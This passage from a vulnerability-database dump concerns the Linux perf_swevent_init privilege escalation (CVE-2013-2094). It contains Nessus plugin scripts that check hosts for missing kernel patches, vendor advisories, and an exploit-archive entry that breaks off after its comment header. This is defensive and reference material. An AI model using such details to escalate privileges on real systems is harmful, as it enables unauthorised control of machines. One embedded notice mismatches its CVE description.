script_xref(name:\"EDB-ID\", value:\"25444\");\n script_xref(name:\"EDB-ID\", value:\"26131\");\n\n script_name(english:\"Amazon Linux AMI : kernel Privilege Escalation (ALAS-2013-190)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"A flaw was found in the way index into perf_swevent_enabled array was\nsanitized. 
A local, unprivileged user could leverage this flaw to gain\nelevated privileges on the system.\"\n );\n # http://aws.amazon.com/amazon-linux-ami/security-bulletins/ALAS-2013-190/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?fa2ce384\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Run 'yum update kernel' to update the system. A reboot will be\nnecessary for the new kernel to be loaded.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-debuginfo-common-i686\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/05/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/03/20\");\n\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/AmazonLinux/release\")) audit(AUDIT_OS_NOT, \"Amazon Linux AMI\");\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n# kernel-docs skipped, rpm_check ignores it\nif (rpm_check(release:\"ALA\", reference:\"kernel-3.4.43-0.0.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"kernel-debuginfo-3.4.43-0.0.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", cpu:\"i686\", reference:\"kernel-debuginfo-common-i686-3.4.43-0.0.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", cpu:\"x86_64\", reference:\"kernel-debuginfo-common-x86_64-3.4.43-0.0.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"kernel-devel-3.4.43-0.0.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"kernel-headers-3.4.43-0.0.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"kernel-tools-3.4.43-0.0.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"kernel-tools-debuginfo-3.4.43-0.0.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0)\n {\n # Disassemble and reassemble rpm_report_get(), the fix version is releases higher than the affected versions\n curr_report = rpm_report_get();\n lines = split(curr_report, sep:'\\n', 
keep:0);\n new_report = \"\";\n foreach currline (lines)\n {\n new_report += str_replace(\n find:\"-3.4.43-0.0.amzn1\",\n replace:\"-3.4.43-43.43.amzn1\",\n string:currline) + '\\n';\n }\n\n security_hole(port:0, extra:new_report);\n }\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-debuginfo / kernel-debuginfo-common-i686 / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T13:47:36", "description": "This update fixes the following security issue :\n\n - It was found that the Scientific Linux 6.1 kernel update\n (SLSA-2011:0542) introduced an integer conversion issue\n in the Linux kernel's Performance Events implementation.\n This led to a user-supplied index into the\n perf_swevent_enabled array not being validated properly,\n resulting in out-of-bounds kernel memory access. A\n local, unprivileged user could use this flaw to escalate\n their privileges. 
(CVE-2013-2094, Important)\n\nA public exploit that affects Scientific Linux 6 is available.\n\nRefer to Red Hat Knowledge Solution 373743 for further information and\nmitigation instructions for users who are unable to immediately apply\nthis update.\n\nThe system must be rebooted for this update to take effect.", "edition": 16, "published": "2013-05-17T00:00:00", "title": "Scientific Linux Security Update : kernel on SL6.x i386/x86_64 (20130516)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-2094"], "modified": "2013-05-17T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:kernel-debuginfo-common-x86_64", "p-cpe:/a:fermilab:scientific_linux:kernel-debug-debuginfo", "p-cpe:/a:fermilab:scientific_linux:kernel", "p-cpe:/a:fermilab:scientific_linux:kernel-debuginfo", "p-cpe:/a:fermilab:scientific_linux:python-perf-debuginfo", "p-cpe:/a:fermilab:scientific_linux:perf-debuginfo", "p-cpe:/a:fermilab:scientific_linux:kernel-debug", "p-cpe:/a:fermilab:scientific_linux:kernel-debuginfo-common-i686", "p-cpe:/a:fermilab:scientific_linux:kernel-firmware", "p-cpe:/a:fermilab:scientific_linux:kernel-headers", "p-cpe:/a:fermilab:scientific_linux:python-perf", "p-cpe:/a:fermilab:scientific_linux:kernel-devel", "p-cpe:/a:fermilab:scientific_linux:kernel-debug-devel", "x-cpe:/o:fermilab:scientific_linux", "p-cpe:/a:fermilab:scientific_linux:kernel-doc", "p-cpe:/a:fermilab:scientific_linux:perf"], "id": "SL_20130516_KERNEL_ON_SL6_X.NASL", "href": "https://www.tenable.com/plugins/nessus/66490", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(66490);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2013-2094\");\n\n script_name(english:\"Scientific Linux Security Update : kernel on SL6.x 
i386/x86_64 (20130516)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes the following security issue :\n\n - It was found that the Scientific Linux 6.1 kernel update\n (SLSA-2011:0542) introduced an integer conversion issue\n in the Linux kernel's Performance Events implementation.\n This led to a user-supplied index into the\n perf_swevent_enabled array not being validated properly,\n resulting in out-of-bounds kernel memory access. A\n local, unprivileged user could use this flaw to escalate\n their privileges. (CVE-2013-2094, Important)\n\nA public exploit that affects Scientific Linux 6 is available.\n\nRefer to Red Hat Knowledge Solution 373743 for further information and\nmitigation instructions for users who are unable to immediately apply\nthis update.\n\nThe system must be rebooted for this update to take effect.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1305&L=scientific-linux-errata&T=0&P=1321\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6935123e\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debug-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debuginfo-common-i686\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:python-perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/05/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/05/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/05/17\");\n script_set_attribute(attribute:\"generated_plugin\", 
value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 6.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL6\", reference:\"kernel-2.6.32-358.6.2.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"kernel-debug-2.6.32-358.6.2.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"kernel-debug-debuginfo-2.6.32-358.6.2.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"kernel-debug-devel-2.6.32-358.6.2.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"kernel-debuginfo-2.6.32-358.6.2.el6\")) flag++;\nif (rpm_check(release:\"SL6\", cpu:\"i386\", reference:\"kernel-debuginfo-common-i686-2.6.32-358.6.2.el6\")) flag++;\nif (rpm_check(release:\"SL6\", cpu:\"x86_64\", reference:\"kernel-debuginfo-common-x86_64-2.6.32-358.6.2.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"kernel-devel-2.6.32-358.6.2.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"kernel-doc-2.6.32-358.6.2.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"kernel-firmware-2.6.32-358.6.2.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"kernel-headers-2.6.32-358.6.2.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"perf-2.6.32-358.6.2.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"perf-debuginfo-2.6.32-358.6.2.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"python-perf-2.6.32-358.6.2.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"python-perf-debuginfo-2.6.32-358.6.2.el6\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if 
(tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-debug / kernel-debug-debuginfo / kernel-debug-devel / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T06:39:39", "description": "A flaw was discovered in the Linux kernel's perf_events interface. A\nlocal user could exploit this flaw to escalate privileges on the\nsystem.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 25, "published": "2013-05-31T00:00:00", "title": "Ubuntu 12.04 LTS : linux-lts-raring vulnerability (USN-1849-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-2094"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-3.8-generic", "cpe:/o:canonical:ubuntu_linux:12.04:-:lts"], "id": "UBUNTU_USN-1849-1.NASL", "href": "https://www.tenable.com/plugins/nessus/66716", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-1849-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. 
Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(66716);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2019/09/19 12:54:29\");\n\n script_cve_id(\"CVE-2013-2094\");\n script_bugtraq_id(59846);\n script_xref(name:\"USN\", value:\"1849-1\");\n\n script_name(english:\"Ubuntu 12.04 LTS : linux-lts-raring vulnerability (USN-1849-1)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A flaw was discovered in the Linux kernel's perf_events interface. A\nlocal user could exploit this flaw to escalate privileges on the\nsystem.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/1849-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected linux-image-3.8-generic package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.8-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/05/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/05/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/05/31\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2013-2019 Canonical, Inc. / NASL script (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(12\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 12.04\", \"Ubuntu \" + release);\nif ( ! 
get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2013-2094\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-1849-1\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.8.0-23-generic\", pkgver:\"3.8.0-23.34~precise1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-3.8-generic\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2019-08-13T18:45:34", "bulletinFamily": "unix", "cvelist": ["CVE-2013-2094"], "description": "The kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issue:\n\n* It was found that the Red Hat Enterprise Linux 6.1 kernel update\n(RHSA-2011:0542) introduced an integer conversion issue in the Linux\nkernel's Performance Events implementation. This led to a user-supplied\nindex into the perf_swevent_enabled array not being validated properly,\nresulting in out-of-bounds kernel memory access. A local, unprivileged user\ncould use this flaw to escalate their privileges. 
(CVE-2013-2094,\nImportant)\n\nA public exploit that affects Red Hat Enterprise Linux 6 is available.\n\nRefer to Red Hat Knowledge Solution 373743, linked to in the References,\nfor further information and mitigation instructions for users who are\nunable to immediately apply this update.\n\nUsers should upgrade to these updated packages, which contain a backported\npatch to correct this issue. The system must be rebooted for this update to\ntake effect.\n", "modified": "2015-04-24T14:20:26", "published": "2013-05-17T04:00:00", "id": "RHSA-2013:0832", "href": "https://access.redhat.com/errata/RHSA-2013:0832", "type": "redhat", "title": "(RHSA-2013:0832) Important: kernel security update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:46:58", "bulletinFamily": "unix", "cvelist": ["CVE-2013-2094"], "description": "The kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issue:\n\n* It was found that the Red Hat Enterprise Linux 6.1 kernel update\n(RHSA-2011:0542) introduced an integer conversion issue in the Linux\nkernel's Performance Events implementation. This led to a user-supplied\nindex into the perf_swevent_enabled array not being validated properly,\nresulting in out-of-bounds kernel memory access. A local, unprivileged user\ncould use this flaw to escalate their privileges. (CVE-2013-2094,\nImportant)\n\nA public exploit that affects Red Hat Enterprise Linux 6 is available.\n\nRefer to Red Hat Knowledge Solution 373743, linked to in the References,\nfor further information and mitigation instructions for users who are\nunable to immediately apply this update.\n\nUsers should upgrade to these updated packages, which contain a backported\npatch to correct this issue. 
The system must be rebooted for this update to\ntake effect.\n", "modified": "2018-06-06T20:24:05", "published": "2013-05-16T04:00:00", "id": "RHSA-2013:0830", "href": "https://access.redhat.com/errata/RHSA-2013:0830", "type": "redhat", "title": "(RHSA-2013:0830) Important: kernel security update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:46:32", "bulletinFamily": "unix", "cvelist": ["CVE-2013-2094"], "description": "The kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issue:\n\n* It was found that the Red Hat Enterprise Linux 6.1 kernel update\n(RHSA-2011:0542) introduced an integer conversion issue in the Linux\nkernel's Performance Events implementation. This led to a user-supplied\nindex into the perf_swevent_enabled array not being validated properly,\nresulting in out-of-bounds kernel memory access. A local, unprivileged user\ncould use this flaw to escalate their privileges. (CVE-2013-2094,\nImportant)\n\nA public exploit that affects Red Hat Enterprise Linux 6 is available.\n\nRefer to Red Hat Knowledge Solution 373743, linked to in the References,\nfor further information and mitigation instructions for users who are\nunable to immediately apply this update.\n\nUsers should upgrade to these updated packages, which contain a backported\npatch to correct this issue. 
The system must be rebooted for this update to\ntake effect.\n", "modified": "2015-04-24T14:17:48", "published": "2013-05-20T04:00:00", "id": "RHSA-2013:0841", "href": "https://access.redhat.com/errata/RHSA-2013:0841", "type": "redhat", "title": "(RHSA-2013:0841) Important: kernel security update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:45:34", "bulletinFamily": "unix", "cvelist": ["CVE-2013-2094"], "description": "The kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issue:\n\n* It was found that the Red Hat Enterprise Linux 6.1 kernel update\n(RHSA-2011:0542) introduced an integer conversion issue in the Linux\nkernel's Performance Events implementation. This led to a user-supplied\nindex into the perf_swevent_enabled array not being validated properly,\nresulting in out-of-bounds kernel memory access. A local, unprivileged user\ncould use this flaw to escalate their privileges. (CVE-2013-2094,\nImportant)\n\nA public exploit that affects Red Hat Enterprise Linux 6 is available.\n\nRefer to Red Hat Knowledge Solution 373743, linked to in the References,\nfor further information and mitigation instructions for users who are\nunable to immediately apply this update.\n\nUsers should upgrade to these updated packages, which contain a backported\npatch to correct this issue. 
The system must be rebooted for this update to\ntake effect.\n", "modified": "2015-04-24T14:17:58", "published": "2013-05-20T04:00:00", "id": "RHSA-2013:0840", "href": "https://access.redhat.com/errata/RHSA-2013:0840", "type": "redhat", "title": "(RHSA-2013:0840) Important: kernel security update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:48", "bulletinFamily": "software", "cvelist": ["CVE-2013-2094"], "description": "\r\n\r\n==========================================================================\r\nUbuntu Security Notice USN-1849-1\r\nMay 31, 2013\r\n\r\nlinux-lts-raring vulnerability\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 12.04 LTS\r\n\r\nSummary:\r\n\r\nThe system could be made to crash or run programs as an administrator if\r\nit received specially crafted network traffic.\r\n\r\nSoftware Description:\r\n- linux-lts-raring: Linux hardware enablement kernel from Raring\r\n\r\nDetails:\r\n\r\nKees Cook discovered a flaw in the Linux kernel's iSCSI subsystem. A remote\r\nunauthenticated attacker could exploit this flaw to cause a denial of\r\nservice (system crash) or potentially gain administrative privileges.\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 12.04 LTS:\r\n linux-image-3.8.0-23-generic 3.8.0-23.34~precise1\r\n\r\nAfter a standard system update you need to reboot your computer to make\r\nall the necessary changes.\r\n\r\nATTENTION: Due to an unavoidable ABI change the kernel updates have\r\nbeen given a new version number, which requires you to recompile and\r\nreinstall all third party kernel modules you might have installed. 
If\r\nyou use linux-restricted-modules, you have to update that package as\r\nwell to get modules which work with the new kernel version. Unless you\r\nmanually uninstalled the standard kernel metapackages (e.g. linux-generic,\r\nlinux-server, linux-powerpc), a standard system upgrade will automatically\r\nperform this as well.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-1849-1\r\n CVE-2013-2094\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/linux-lts-raring/3.8.0-23.34~precise1\r\n\r\n\r\n\r\nAttached Message Part\r\n\r\n\r\n\r\n-- ubuntu-security-announce mailing list ubuntu-security-announce@lists.ubuntu.com Modify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\r\n", "edition": 1, "modified": "2013-06-03T00:00:00", "published": "2013-06-03T00:00:00", "id": "SECURITYVULNS:DOC:29436", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:29436", "title": "[USN-1849-1] Linux kernel (Raring HWE) vulnerability", "type": "securityvulns", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:26", "description": "\nLinux Kernel 3.8.9 (x86-64) - perf_swevent_init Local Privilege Escalation (2)", "edition": 1, "published": "2013-06-11T00:00:00", "title": "Linux Kernel 3.8.9 (x86-64) - perf_swevent_init Local Privilege Escalation (2)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-2094"], "modified": "2013-06-11T00:00:00", "id": "EXPLOITPACK:EC6E04EF12A9F66A20251DC5556474BC", "href": "", "sourceData": "/*\n * CVE-2013-2094 exploit x86_64 Linux < 3.8.9\n * by sorbo (sorbo@darkircop.org) June 2013\n *\n * Based on sd's exploit. 
